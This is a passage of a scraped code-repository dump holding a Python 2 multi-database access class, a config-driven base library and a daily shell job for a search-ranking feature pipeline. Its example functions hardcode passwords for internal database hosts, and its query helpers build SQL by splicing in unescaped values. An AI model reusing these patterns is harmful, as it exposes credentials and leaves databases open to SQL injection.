SystemError, 'SQL or Interface Error:%s\\n[SQL]:%s\\n' % (ex,sql)\n\n\n\tdef _commit(self):\n\t\tself.conn.commit()\n\n\n\tdef execute(self,sql,params={}):\n\t\t'''\n\t\t\t在连接上执行一个query,params是一个字典,用params中的值替换sql中的键\n\t\t'''\n\t\tif not isinstance(params,dict):\n\t\t\tsys.stderr.write(\"Params Error:'%s' is not dictionary\\n\" % (params))\n\t\t\traise SystemError, \"Params Error:'%s' is not dictionary\\n\" % (params)\n\t\t#如果有参数,进行参数替换\n\t\tif len(params) != 0:\n\t\t\tsql = 
DataObject.Check_query(sql,params)\n\t\tself.get_cursor()\n\t\tif self.cursor == None:\n\t\t\traise NameError, 'self.cursor is not defined!\\n'\n\t\tself._execute(self.cursor, sql)\n\n\n\tdef commit(self):\n\t\t'''\n\t\t\t在非自动提交模式\n\t\t\t针对所有update, delete, insert更新操作(execute调用)\n\t\t\t执行一个提交操作\n\t\t\t只对事务性数据库有效\n\t\t'''\n\t\tself._commit()\n\n\n\tdef rollback(self):\n\t\t'''\n\t\t\t在非自动提交模式\n\t\t\t执行一个回滚操作\n\t\t\t对事务性数据库有效\n\t\t'''\n\t\tif self.conn_str[0] in ['mysql', 'mssql', 'oracle']:\n\t\t\tself.conn.rollback()\n\t\telse:\n\t\t\traise NotSupportedError, 'hive does not support rollback'\n\n\n\tdef Get_query(configpath,title,sqlname,params = {}):\n\t\t'''\n\t\t\tget_query的静态版本\n\t\t'''\n\t\tif not isinstance(params,dict):\n\t\t\tsys.stderr.write(\"Params Error:'%s' is not dictionary\\n\" % (params))\n\t\t\traise SystemError, \"Params Error:'%s' is not dictionary\\n\" % (params)\n\t\tconfig = ConfigParser.ConfigParser()\n\t\tconfig.read(configpath)\n\t\tsql = config.get(title,sqlname)\n\t\tsql = DataObject.Check_query(sql,params)\n\t\tsql = '\\x20'.join(sql.split('\\n'))\n\t\treturn sql\n\tGet_query = staticmethod(Get_query)\n\t\n\n\tdef get_query(self,configpath,title,sqlname,params = {}):\n\t\t'''\n\t\t\t从配置文件中获取一个sql,params是一个字典,在用值替换SQL中的键\n\t\t'''\n\t\tif not isinstance(params,dict):\n\t\t\tsys.stderr.write(\"Params Error:'%s' is not dictionary\\n\" % (params))\n\t\t\traise SystemError, \"Params Error:'%s' is not dictionary\\n\" % (params)\n\t\tconfig = ConfigParser.ConfigParser()\n\t\tconfig.read(configpath)\n\t\tsql = config.get(title,sqlname)\n\t\tsql = DataObject.Check_query(sql,params)\n\t\tsql = '\\x20'.join(sql.split('\\n'))\n\t\treturn sql \n\n\n\tdef create_table(self,sql):\n\t\t'''\n\t\t\t按照SQL创建一个表\n\t\t'''\n\t\tif self.conn_str[0] in ['mysql']:\n\t\t\tself._create_mysql_tbl(sql)\n\n\t\tif self.conn_str[0] in ['hive']:\n\t\t\tself._create_hive_tbl(sql)\n\t\t\t\t\n\n\tdef _create_hive_tbl(self,sql):\n\t\tself.execute(sql)\n\n\n\tdef _create_mysql_tbl(self,sql):\n\t\tself.execute(sql)\n\n\n\tdef drop_table(self,sql):\n\t\t'''\n\t\t\t按照SQLdrop一个表\n\t\t'''\n\t\tif self.conn_str[0] in ['mysql']:\n\t\t\tself._drop_mysql_tbl(sql)\n\t\tif self.conn_str[0] in ['hive']:\n\t\t\tself._drop_hive_tbl(sql)\n\n\n\tdef _drop_hive_tbl(self,sql):\n\t\tself.execute(sql)\n\n\n\tdef _drop_mysql_tbl(self,sql):\n\t\tself.execute(sql)\n\n\n\tdef load_to_txt(self,sql,filepath,append=False, use_filter=True):\n\t\t'''\n\t\t\t把数据源中的数据按照SQL放入指定路径的文件中\n\t\t\tappend: 写入文件时是否使用追加的方式,True表示使用追加\n\t\t\tuse_filter: 是否过滤数据,True表示使用内部函数data_filter过滤数据,\n\t\t\t\t\t\t此选项将对性能造成较大影响\n\t\t'''\n\t\tif self.conn_str[0] in ['mysql','mssql','oracle']:\n\t\t\tself._db_to_file(sql,filepath,append, use_filter)\n\t\t\treturn self.rowcount \n\n\t\tif self.conn_str[0] in ['hive']:\n\t\t\tself._hive_to_file(sql,filepath,append, use_filter)\n\t\t\treturn self.rowcount\n\n\n\tdef _hive_to_file(self,sql,filepath,append, use_filter):\n\t\tfile = None\n\t\tif append == False:\n\t\t\tfile = open(filepath,'w')\n\t\telse:\n\t\t\tfile = open(filepath,'a')\n\t\tself.execute(sql)\n\t\tline = ''\n\t\twhile (1):\n\t\t\trows = self.fetchmany(1000)\n\t\t\tif len(rows) == 0:\n\t\t\t\tbreak\n\t\t\tfor row in rows:\n\t\t\t\tfields = []\n\t\t\t\tfor item in row:\n\t\t\t\t\t#过滤字段中的特殊字符\n\t\t\t\t\tif use_filter:\n\t\t\t\t\t fields.append(self.data_filter(item))\n\t\t\t\t\t#不过滤\n\t\t\t\t\telse:\n\t\t\t\t\t fields.append(item)\n\t\t\t\tline = '\\t'.join(fields) + '\\n'\n\t\t\t\tfile.write(line)\n\t\t\t\tfile.flush()\n\t\t# ed 
while\n\t\tfile.close()\n\n\n\tdef _db_to_file(self,sql,filepath,append, use_filter):\n\t\tfile = None\n\t\tif append == False:\n\t\t\tfile = open(filepath,'w')\n\t\telse:\n\t\t\tfile = open(filepath,'a')\n\t\tself.execute(sql)\n\t\twhile(True):\n\t\t\trows = self.fetchmany(1000)\n\t\t\tif len(rows) <= 0:\n\t\t\t\tbreak\n\t\t\tfor row in rows:\n\t\t\t\tfields = []\n\t\t\t\tfor item in row:\n\t\t\t\t\t#数据清洗\n\t\t\t\t\tif use_filter:\n\t\t\t\t\t\tfields.append(self.data_filter(item))\n\t\t\t\t\t#不清洗\n\t\t\t\t\telse:\n\t\t\t\t\t\tfields.append(self.to_str(item))\n\t\t\t\tline = '\\t'.join(fields) + '\\n'\t\n\t\t\t\tfile.write(line)\n\t\t\t\tfile.flush()\n\t\t#END WHILE\n\t\tfile.close()\n\n\n\tdef check_query(self,sql,params):\n\t\t'''\n\t\t\t[duplicate function]\n\t\t\t检查SQL是否符合规范, 不要直接调用\n\t\t'''\n\t\tif len(params) != 0:\n\t\t\ttry:\n\t\t\t\tfor key in params:\n\t\t\t\t\tif params.get(key) == None:\n\t\t\t\t\t\traise AttributeError, 'AttributeError:key(%s) in params has no Value' % (key)\n\t\t\t\t\tif sql.find(('%s' % key)) == -1:\n\t\t\t\t\t\traise AttributeError, 'AttributeError:key(%s) in params is not in [SQL]:%s' % (key,sql)\n\t\t\t\t\tvar = '%s' % key\n\t\t\t\t\tval = \"%s\" % params.get(key)\n\t\t\t\t\tsql = sql.replace(var,val)\n\t\t\texcept AttributeError, ex:\n\t\t\t\tsys.stderr.write('%s\\n' % ex)\n\t\t\t\traise SystemError, ex\n\t\treturn sql\n\n\n\tdef Check_query(sql,params):\n\t\t'''\n\t\t\tcheck_query的静态版本\n\t\t'''\n\t\tif len(params) != 0:\n\t\t\ttry:\n\t\t\t\tfor key in params:\n\t\t\t\t\tif params.get(key) == None:\n\t\t\t\t\t\traise AttributeError, 'AttributeError:key(%s) in params has no Value' % (key)\n\t\t\t\t\tif sql.find(('%s' % key)) == -1:\n\t\t\t\t\t\traise AttributeError, 'AttributeError:key(%s) in params is not in [SQL]:%s' % (key,sql)\n\t\t\t\t\tvar = '%s' % key\n\t\t\t\t\tval = \"%s\" % params.get(key)\n\t\t\t\t\tsql = sql.replace(var,val)\n\t\t\texcept AttributeError, ex:\n\t\t\t\tsys.stderr.write('%s\\n' % ex)\n\t\t\t\traise SystemError, ex\n\t\treturn sql\n\tCheck_query = staticmethod(Check_query)\n\n\n\tdef load_from_txt(self,filepath,tblname,replace=False,fields_trnr='\\t'):\n\t\t'''\n\t\t\tload_to_txt的配对函数,用于把文件中的数据load进新数据源\n\t\t\t要求目标数据的schema已经存在\n\t\t\t目前只支持 all ---> mysql 与 all ---> hive方式\n\t\t\ttblname: 目标表名或是库.表 名\n\t\t\treplace: load数据时,遇见相同的行是否用新行替换,True表示替换\n\t\t\tfields_trnr: load时,数据文件字段分割符\n\t\t'''\n\t\tif self.conn_str[0] in ['mysql']:\n\t\t\treturn self._load_to_mysql(filepath,tblname,replace,fields_trnr)\n\t\tif self.conn_str[0] in ['mssql']:\n\t\t\tsys.stderr.write('SQL Server Load Program is not ready yet\\n')\n\t\tif self.conn_str[0] in ['hive']:\n\t\t\treturn self._load_to_hive(filepath,tblname)\n\n\n\tdef _load_to_mysql(self,filepath,tblname,replace,fields_trnr):\n\t\t\tpredo = 'SET max_error_count = 0; '\n\t\t\tif replace == True:\n\t\t\t\tsql = \"LOAD DATA LOCAL INFILE '%s' REPLACE INTO TABLE %s CHARACTER SET UTF8 FIELDS TERMINATED BY \" \\\n\t\t\t\t\t \"'%s' ENCLOSED BY '%s'; \" % (filepath, tblname, fields_trnr, '\\\"')\n\t\t\telse:\n\t\t\t\tsql = \"LOAD DATA LOCAL INFILE '%s' IGNORE INTO TABLE %s CHARACTER SET UTF8 FIELDS TERMINATED BY \" \\\n\t\t\t\t\t \"'%s' ENCLOSED BY '%s'; \" % (filepath, tblname, fields_trnr, '\\\"') \n\t\t\ttry:\n\t\t\t\tself.execute(predo)\n\t\t\texcept Error, ex:\n\t\t\t\traise SystemError, '(MySQL LOAD DATA ERROR)%s' % ex\n\n\t\t\ttry:\n\t\t\t\tself.execute(sql)\n\t\t\t\tself.commit()\n\t\t\texcept Error, ex:\n\t\t\t\traise SystemError, '(MySQL LOAD DATA ERROR)%s' % ex\n\n\n\tdef 
_load_to_hive(self,filepath,tblname):\n\t\t\tsql = 'LOAD DATA LOCAL INPATH ' + \"'\" + filepath + \"'\" + ' INTO TABLE ' + tblname\n\t\t\ttry:\n\t\t\t\tself.execute(sql)\n\t\t\texcept Thrift.TException, ex:\n\t\t\t\traise SystemError, '(HIVE LOAD DATA ERROR)%s' % ex\n \n\n\tdef _load_to_oracle(self,filepath,tblname):\n\t\tpass\n\n\n\tdef Insert_as_select(src,dest,sql,tblname,replace = False, use_filter = True):\n\t\t'''\n\t\t\t此函数先对数据源src(hive, mysql, oracle, sqlserver)上执行一个查询\n\t\t\t然后在dest(仅限mysql)上根据查询的结果集迭代的执行insert\n\t\t\t这一对儿动作是一个原子操作\n\t\t\t目前支持 all ---> mysql 方式\n\t\t\tsrc: 源连接 DataObject对象\n\t\t\tdest: 目标连接 DataObject对象\n\t\t\treplace, use_filter同load_from_txt()\n\t\t'''\n\t\tif dest.conn_str[0] in ['mysql']:\n\t\t\tcursor = dest.conn.cursor()\n\t\t\tcursor.execute('set autocommit = 1')\n\t\t\tcursor.execute('set max_error_count = 0')\n\t\t\tcursor.close()\n\t\t\n\t\tsrc.execute(sql)\n\t\twhile (1):\n\t\t\t#按源数据库的类型拿到要插入的数据集\n\t\t\trows = src.fetchmany(1000)\n\t\t\tif len(rows) <= 0:\n\t\t\t\tbreak\n\t\t\tdataset = []\n\t\t\tfor row in rows:\n\t\t\t\tinner_lst = []\n\t\t\t\tfor item in row:\n\t\t\t\t\t#数据清洗\n\t\t\t\t\tif use_filter:\n\t\t\t\t\t\titem = src.data_filter(item)\n\t\t\t\t\t#不清洗\n\t\t\t\t\telse:\n\t\t\t\t\t\titem = src.to_str(item)\n\t\t\t\t\tinner_lst.append(item)\n\t\t\t\tdataset.append(inner_lst)\n\t\t\t#数据合并,按目标数据库类型的不同执行不同的合并函数\n\t\t\ttry:\n\t\t\t\tif dest.conn_str[0] in ['mysql']:\n\t\t\t\t\tDataObject._Insert_to_mysql_select(dest,dataset,tblname,replace)\n\t\t\t\tif dest.conn_str[0] in ['hive']:\n\t\t\t\t\traise ValueError, \"ValueError:Hive does not support 'Insert' Mutipulation\"\n\t\t\t\tif dest.conn_str[0] in ['Oracle']:\n\t\t\t\t\traise SystemError, \"Exit Request:Oracle does not yet supported\"\n\t\t\texcept (ValueError,SystemError), ex:\n\t\t\t\tsys.stderr.write('%s\\n' % (ex))\n\t\t\t\traise SystemError, ex\n\t\treturn dest.rowcount\n\tInsert_as_select = staticmethod(Insert_as_select)\n\n\n\tdef _Insert_to_mysql_select(dest,dataset,tblname,replace):\n\t\tif replace == True:\n\t\t\tfor row in dataset:\n\t\t\t\tcursor = dest.conn.cursor()\n\t\t\t\tsql = \"REPLACE INTO %s VALUES (\" % (tblname)\n\t\t\t\tfor item in row:\n\t\t\t\t\tif item in [\"''\",'\"\"']:\n\t\t\t\t\t\tsql += \"'',\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tsql += \"'%s',\" % (item)\n\t\t\t\tsql = sql[:-1] + ');'\n\t\t\t\tcursor.execute(sql)\n\t\t\t\tdest.rowcount += 1\n\t\t\t\tcursor.close()\n\t\telse:\n\t\t\tfor row in dataset:\n\t\t\t\tcursor = dest.conn.cursor()\n\t\t\t\tsql = \"INSERT IGNORE INTO %s VALUES (\" % (tblname)\n\t\t\t\tfor item in row:\n\t\t\t\t\tif item in [\"''\",'\"\"']:\n\t\t\t\t\t\tsql += \"'',\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tsql += \"'%s',\" % (item)\n\t\t\t\tsql = sql[:-1] + ');'\n\t\t\t\tcursor.execute(sql)\n\t\t\t\tdest.rowcount += 1\n\t\t\t\tcursor.close()\n\t_Insert_to_mysql_select = staticmethod(_Insert_to_mysql_select)\n\n\n\tdef _Insert_to_oracle_select(dest,dataset,tblname):\n\t\tpass\n\t_Insert_to_oracle_select = staticmethod(_Insert_to_oracle_select)\n\n\n\tdef fetchmany(self,count):\n\t\t'''\n\t\t\t没什么,就是fetchmany\n\t\t\tcount为一次迭代取的行数\n\t\t'''\n\t\tif not self.cursor:\n\t\t\traise NameError, 'self.cursor is not defined!\\n'\n\t\tresult = []\n\t\tif self.conn_str[0] == 'mssql':\n\t\t\tresult = self.cursor.fetchmany(count)\n\t\t\tself.rowcount = self.cursor.rowcount\n\n\t\tif self.conn_str[0] == 'mysql':\n\t\t\tresult = self.cursor.fetchmany(count)\n\t\t\tself.rowcount += len(result)\n\n\t\tif self.conn_str[0] == 'oracle':\n\t\t\tresult = 
self.cursor.fetchmany(count)\n\t\t\tself.rowcount = self.cursor.rowcount\n\n\t\tif self.conn_str[0] == 'hive':\n\t\t\ttry:\n\t\t\t\trows = self.cursor.fetchN(count)\n\t\t\t\tif len(rows) <= 0:\n\t\t\t\t\treturn result\n\t\t\t\tfor row in rows:\n\t\t\t\t\tlist = row.split('\\t')\n\t\t\t\t\tresult.append(list)\n\t\t\t\tself.rowcount += len(rows)\n\t\t\texcept Thrift.TException, tx:\n\t\t\t\tself.close()\n\t\t\t\tsys.stderr.write('%s\\n' % (tx))\n\t\t\t\traise SystemError, tx\n\t\treturn result\n\n\n\tdef fetchone(self):\n\t\t'''\n\t\t\t没什么,就是fetchone\n\t\t'''\n\t\tif not self.cursor:\n\t\t\traise NameError, 'self.cursor is not defined!'\n\t\tresult = []\n\t\tif self.conn_str[0] == 'mssql':\n\t\t\tresult = self.cursor.fetchone()\n\t\t\tself.rowcount = self.cursor.rowcount\n\n\t\tif self.conn_str[0] == 'mysql':\n\t\t\tresult = self.cursor.fetchone()\n\t\t\tself.rowcount += 1\n\n\t\tif self.conn_str[0] == 'oracle':\n\t\t\tresult = self.cursor.fetchone()\n\t\t\tself.rowcount = self.cursor.rowcount\n\n\t\tif self.conn_str[0] == 'hive':\n\t\t\ttry:\n\t\t\t\trow = self.cursor.fetchOne()\n\t\t\t\tif len(row) <= 0:\n\t\t\t\t\treturn result\n\t\t\t\tresult = row.split('\\t')\n\t\t\t\tself.rowcount += 1\n\t\t\texcept Thrift.TException, tx:\n\t\t\t\tself.close()\n\t\t\t\tsys.stderr.write('%s\\n' % (tx))\n\t\t\t\traise SystemError, tx\n\t\treturn result\n\n\n\tdef fetchall(self):\n\t\t'''\n\t\t\t没什么,就是fetchall\n\t\t'''\n\t\tif not self.cursor:\n\t\t\traise NameError, 'self.cursor is not defined!'\n\t\tresult = []\n\t\tif self.conn_str[0] == 'mssql':\n\t\t\tresult = self.cursor.fetchall()\n\t\t\tself.rowcount = self.cursor.rowcount\n\t\t\n\t\tif self.conn_str[0] == 'mysql':\n\t\t\tresult = self.cursor.fetchall()\n\t\t\tself.rowcount = len(result)\n\n\t\tif self.conn_str[0] == 'oracle':\n\t\t\tresult = self.cursor.fetchall()\n\t\t\tself.rowcount = self.cursor.rowcount\n\n\t\tif self.conn_str[0] == 'hive':\n\t\t\ttry:\n\t\t\t\trows = self.cursor.fetchAll()\n\t\t\t\tif len(rows) <= 0:\n\t\t\t\t\treturn result\n\t\t\t\tfor row in rows:\n\t\t\t\t\tlist = row.split('\\t')\n\t\t\t\t\tresult.append(list)\n\t\t\t\tself.rowcount = len(rows)\n\t\t\texcept Thrift.TException, tx:\n\t\t\t\tself.close()\n\t\t\t\tsys.stderr.write('%s\\n' % (tx))\n\t\t\t\traise SystemError, tx\n\t\treturn result\n\n\n\tdef rows_affected(self):\n\t\t'''\n\t\t\t返回影响行数(整数)\n\t\t'''\n\t\treturn self.rowcount\n\n\n\tdef to_str(self,field):\n\t\tif field in ['',\"''\",None]:\n\t\t\tfield = '\"\"'\n\t\tif self.conn_str[0] in ['mysql','mssql']:\n\t\t\tfield = unicode(field)\n\t\tif self.conn_str[0] == 'oracle':\n\t\t\tfield = str(field)\n\t\tif self.conn_str[0] == 'hive':\n\t\t\tpass\n\t\treturn field\n\n\n\tdef data_filter(self,field):\n\t\t'''\n\t\t\t数据清洗,不要直接调用\n\t\t'''\n\t\tif field in [None,'','\"',\"'\",\"''\"]:\n\t\t\tfield = '\"\"'\n\t\telse:\n\t\t\t#从db拿到的数据有各种类型,要统一转成字符串\n\t\t\tif self.conn_str[0] in ['mysql','mssql']:\n\t\t\t\tfield = unicode(field)\n\t\t\tif self.conn_str[0] in ['oracle']:\n\t\t\t\tfield = str(field)\n\t\t\t#从hive拿到的数据本身是字符串,不用转\n\t\t\tif self.conn_str[0] == 'hive':\n\t\t\t\tpass\n\t\t\t#不将双引号本身转义\n\t\t\tif len(field) >= 3:\n\t\t\t\tfield = field.replace('\"','')\n\t\t\t\tfield = field.replace(\"'\",'')\n\n\t\t\t#控制字符过滤\n\t\t\t#ctrl + A/a --- ctrl + Z/z\n\t\t\tfield = re.sub(r'\\x01|\\x02|\\x03|\\x08|\\x09|\\x0A|\\x0B|\\x0C|\\x0D|\\x1B|\\x1C|\\x1D|\\x1E|\\x1F|\\\\', \n\t\t\t\t\t\t\t'', field)\n\t\treturn field\n\n\n\tdef close(self):\n\t\t'''\n\t\t\t关闭DataObject连接\n\t\t'''\n\t\tif 
self.conn:\n\t\t\tself.close_cursor()\n\t\t\tself.conn.close()\n\t\tself.rowcount = 0\n\t\tself.conn = None\n \n\n\tdef disconnect(self):\n\t\t'''\n\t\t\tclose的向下兼容版本\n\t\t'''\n\t\tself.close()\n\n\n\tdef __del__(self):\n\t\t'''\n\t\t\t析构函数, 回收连接相关资源\n\t\t'''\n\t\tself.close()\n\n\n\ndef hive_exmp():\n\t'''\n\t\t我们的21集群没权限系统,所以无用户名和密码形参\n\t'''\n\tconn = DataObject.Connect(dbtype='hive', host='localhost', port=10010)\n\tconn.execute('use addr')\n\tconn.execute('select * from user_addr_in_order limit 2')\n\tfor row in conn.fetchall():\n\t\tprint '\\t'.join(map(str, row))\n\tconn.close()\n\n\ndef mysql_exmp():\n\t'''\n\t\tdbtype, host, user, password, port是必填项\n\t'''\n\tconn = DataObject.Connect(dbtype='mysql', host='10.255.253.16', user='readuser', password='ru@r&d', \\\n\t\t\t\t\t\t\t port=3306, database='AntiFraud', charset='utf8')\n\tconn.execute('show tables')\n\tfor row in conn.fetchall():\n\t\tprint '\\t'.join(map(str, row))\n\tconn.close()\n\n\ndef oracle_exmp():\n\t'''\n\t\t要求使用dsn去连接oracle\n\t\tdbtype, dsn, user, password是必填项\n\t'''\n\tconn = DataObject.Connect(dbtype='oracle', dsn='reportstaging.idc2:1521/staging1', user='v_stage', \\\n\t\t\t\t\t\t\t password='v_stage') \n\tconn.execute('select table_name from user_tables')\n\tfor row in conn.fetchall():\n\t\tprint '\\t'.join(map(str, row))\n\tconn.close()\n\n\ndef sqlserver_exmp():\n\t'''\n\t\tdbtype, host, user, password, port是必填项\n\t'''\n\tconn = DataObject.Connect(dbtype='mssql', host='172.16.128.86', user='readuser', password='password', port=1433, \\\n\t\t\t\t\t\t\t database='customer', charset='utf8')\n\tconn.execute('select top(2) * from customers')\n\tfor row in conn.fetchall():\n\t\tprint '\\t'.join(map(str, row))\n\tconn.close()\n\n\ndef main():\n\tprint '由于连接或端口限制,以下所有例子,只保证在21上执行成功'\n\tprint '************ hive example **************'\n\thive_exmp()\n\tprint '************ mysql example *************'\n\tmysql_exmp()\n\tprint '************ oracle example ************'\n\toracle_exmp()\n\tprint '************ sqlserver example *********'\n\tsqlserver_exmp()\n\tprint '***************** end ******************'\n\n\nif __name__ == '__main__':\n\tmain()\n" }, { "alpha_fraction": 0.6483445763587952, "alphanum_fraction": 0.6518804430961609, "avg_line_length": 20.163265228271484, "blob_id": "4c57f45a29ab1cd00d7b32ca991e7d9434ef7bbf", "content_id": "d9180a69f5c57ccd6598766ec9dd16ec6828865a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3259, "license_type": "no_license", "max_line_length": 110, "num_lines": 147, "path": "/lib/base_lib.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#encoding:utf-8\n\n##Author:maorui\n##Date :2012-08-30\n##File :base_lib.py\n##comment:基础类库用于封装一些简单的功能\n##\t\t\n\t\t\nimport sys\nimport os\nfrom ConfigParser import RawConfigParser\nfrom ConfigParser import *\nfrom getopt import getopt\nimport logging\nimport logging.config\nimport time\nimport datetime\nimport socket\t\t\t\t\nimport struct\n\nfrom data_access_object import DataObject\nfrom db_factory import DBFactory\nfrom Joblog import Joblog\nfrom mail_sender import MailSender\n\ndef get_path():\n\t\n\t\"\"\"\n\tget opt parameter\n\t\"\"\"\n\tpath =''\n\ttry:\n\t\topts, val = getopt(sys.argv[1:], 'c:', ['path='])\n\t\tconf_path = ''\n\t\tfor opt, var in opts:\n\t\t\tif opt in ['-c']:\n\t\t\t\tconf_path = var\n\t\t\tif opt in ['--path']:\n\t\t\t\tconf_path = var\n\t\tif not os.path.exists(conf_path):\n\t\t\traise 
Exception,'the path is not existence'\n\texcept Exception,ex:\n\t\traise Exception,ex\n\n\treturn conf_path \n\n\n\nclass BaseLib(object):\n\n\tdef __init__(self,conf_path):\n\t \n\t\t'''\n\t\t初始化配置文件和日志文件\n\t\t'''\n\t\tself.connfile = '%s/conf/connect.cfg' % (conf_path)\n\t\tself.sqlfile = '%s/conf/sql.cfg' % (conf_path)\n\t\t\n\t\tself.config = RawConfigParser()\n\t\tself.config.read(self.connfile)\n\t\tself.sqlsets = RawConfigParser()\n\t\tself.sqlsets.read(self.sqlfile)\n\t\n\tdef connect_db(self,section = ''):\n\t\t\"\"\"\n\t\t主要用于连接数据库,并返回连接对象\n\t\t\"\"\"\n\t\tsection = section.strip(' ')\n\t\ttry:\n\t\t\tdbtype = self.config.get(section,'dbtype')\n\t\t\thost = self.config.get(section,'host')\n\t\t\tuser = self.config.get(section,'user')\n\t\t\tpassword = self.config.get(section,'password')\n\t\t\tport = self.config.get(section,'port')\n\t\t\tdatabase = self.config.get(section,'database')\n\t\texcept: \n\t\t\traise Exception, 'get %s date error' % (section)\n\t\ttry:\n\t\t\tsql_conn = DBFactory.Connect(dbtype = dbtype,host = host,database = database,charset = 'utf8',user = user,\\\n\t\t\t\t\t\t\t password = password,port = port)\n\t\t\tsql_conn.get_cursor()\n\t\texcept:\n\t\t\traise Exception, 'connect databse under %s error' % (section)\n\t\treturn sql_conn\n\t\n\tdef get_sql(self,section = '',option = ''):\n\t\t'''\n\t\t获取配置文件中的sql语句\n\t\t'''\n\t\tsql = ''\n\t\tsection = section.strip(' ')\n\t\toption = option.strip('')\n\t\ttry:\n\t\t\tsql = self.sqlsets.get(section, option)\n\t\texcept: \n\t\t\traise Exception, 'get sql under %s %s error' % (section,option)\n\t\treturn sql\n\n\tdef get_monitor(self,title = ''):\n\t\t\"\"\"\n\t\tget monitor object\n\t\t\"\"\"\n\t\tjoblog = None\n\t\ttitle = title.strip(' ')\n\n\t\ttry: \n\t\t\thost = self.config.get(title, 'host')\n\t\t\tuid\t= self.config.get(title, 'user')\n\t\t\tpwd\t= self.config.get(title, 'password')\n\t\t\tdb\t = self.config.get(title, 'database')\n\t\t\tjoblog = Joblog(host, uid, pwd, db)\n\t\t\t\n\t\texcept Exception, ex: \n\t\t\treturn \n\n\t\treturn joblog\n\n\tdef send_mail(self,title, content):\n\t\t'''\n\t\t出现异常是发送邮件报告\n\t\t'''\n\t\t#初始化邮件发送对象\n\n\t\temail = MailSender()\n\t\ttry:\n\t\t\temail_to = self.config.get('email','receiver')\n\t\t\temail_receivers = email_to.split(';')\n\t\t\temail.sendMail(email_receivers,title, str(content))\n\t\texcept Exception, ex: \n\t\t\treturn \n\n\n\n\ndef test():\n\tpath = get_path()\n\tprint path\n\n\tobj = BaseLib(path)\n\t\n\tsql_conn = obj.connect_db('connect_mysql')\n\tsql = obj.get_sql('SELECT','get_region_list')\n\tsql_conn.execute(sql)\n\nif __name__ == '__main__':\n\ttest()\n" }, { "alpha_fraction": 0.6517386436462402, "alphanum_fraction": 0.692307710647583, "avg_line_length": 22.14634132385254, "blob_id": "3af4098962779133eb61e0afe57031df26ce56d3", "content_id": "d260fa815785a8ae7b4659de5ace020f40ea199c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1898, "license_type": "no_license", "max_line_length": 105, "num_lines": 82, "path": "/bin/everyday_job.sh", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/bin/sh\nPYTHON=/usr/local/bin/python\n\nwork_path=\"/d2/caiting/search_ranking/ltr_feartures_compute_job\"\n\ndata_url=\"http://192.168.197.151:9030/joblog/data/\" \nclick_url=\"http://192.168.197.151:9030/joblog/click/detail/\"\nuv_url=\"http://192.168.197.176:9030/joblog/data/\"\n\nsearch_lastday=$(date -d yesterday +%Y%m%d)\nuv_lastday=$(date -d yesterday 
+%Y-%m-%d)\n\nsearch_log=log\\-$search_lastday\\_search.clean.tar.bz2\nclick_log=search\\-${search_lastday:2:8}\nday_uv_log=uv_d_$uv_lastday\nweek_uv_log=uv_w_$uv_lastday\nmonth_uv_log=uv_m_$uv_lastday\n\necho $search_lastday\n\n# load search log data from url \necho \"load show, click and uv data from url ...\"\nif [ $? -eq 0 ];then\n\tcd $work_path/data/temp_data\n\twget $data_url$search_log\n\twget $click_url$click_log\n\twget $uv_url$day_uv_log\n\twget $uv_url$week_uv_log\n\twget $uv_url$month_uv_log\n\ttar -jxvf $search_log && rm -f *.tar.*\nelse\n\texit -1\nfi\n\n\n#get each feature from mysql\necho \"load product info from db and init search_log data ...\"\nif [ $? -eq 0 ];then\n\tcd $work_path/bin\n\t$PYTHON main.py \nelse\n\texit -2\nfi \n\n# caculate ctr for each pid\necho \"caculate ctr ...\"\nif [ $? -eq 0 ];then\n\tcd $work_path/bin\n\t$PYTHON caculate_features_for_model.py $search_lastday\nelse\n\texit -3\nfi\n\n# change data to static_hashmap and then send to online search_engine\necho \"change pid_ctr file to statichashmap and scp to search server...\"\nif [ $? -eq 0 ];then\n\t./map2hashmap\n\tscp ../data/pid2rankvalue [email protected]:/home/search/caiting/search_test/modules/search_ranking/\nelse\n\texit -4\nfi\n \n\n# clear the search_log data\necho \"clean temp_data/* ...\"\nif [ $? -eq 0 ];then\n\t#cd $work_path/data && rm -f product_info_$uv_lastday \n\tcd $work_path/data/temp_data/ && rm -f *\nelse\n\texit -5\nfi\n\n#save data for thrift server\necho \"thrift data saving ...\"\nif [ $? -eq 0 ];then\n\tcd $work_path/bin\n\t$PYTHON set_thrift_server_data.py $search_lastday\nelse\n\texit -6\nfi\n\necho \"ok !\"\n" } ]
13
shiinaL/Python
https://github.com/shiinaL/Python
fd3c7808bebdac9514e9cbd94a231cb4acc6dc2f
d1240daccdfa5af3d9b255919dc43bd444aaf717
00fd0bd427414e08258403187c7d9d11b34c62a7
refs/heads/master
2020-04-22T21:02:41.234302
2019-02-14T09:23:17
2019-02-14T09:23:17
170,660,629
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.47109469771385193, "alphanum_fraction": 0.505945086479187, "avg_line_length": 12.042780876159668, "blob_id": "308c474e2d07f16607229e392dcb871006eb9a4b", "content_id": "7ebe63f5acdc2d6469efa60c795206fb60f7d470", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2679, "license_type": "no_license", "max_line_length": 61, "num_lines": 187, "path": "/1211.py", "repo_name": "shiinaL/Python", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# 输入打印\n# s = input('input your birthday:')\n# birthday = int(s)\n# if birthday <20:\n# \tprint('hello',birthday)\n# else:\n# \tprint('hi',birthday)\n\n# 数据列表的使用\n# list\nlist_a = [1, False, '123', [1, 2]]\n# 添加\nlist_a.append(9)\nprint(list_a)\n# 删除\nlist_a.pop()\nprint(list_a)\nlist_a.pop(0)\nprint(list_a)\n# 修改\nlist_a[0] = True\nprint(list_a)\nlist_a.insert(1, 998)\nprint(list_a)\n# 查询\nprint(list_a[1])\n\n# tuple\ntuple_a = ('司马光', '祖冲之', '魏延')\n# 查询\nprint(tuple_a[0])\n\n# 条件判断\nage = 19\nif age > 18:\n print('你已成年')\n\n# 循环\nfor n in range(0, 10):\n if(n > 5):\n break\n print(n)\n\nfor n in range(0, 10):\n if(n % 2 == 0):\n continue\n print(n)\n\n# 字典的使用\n# 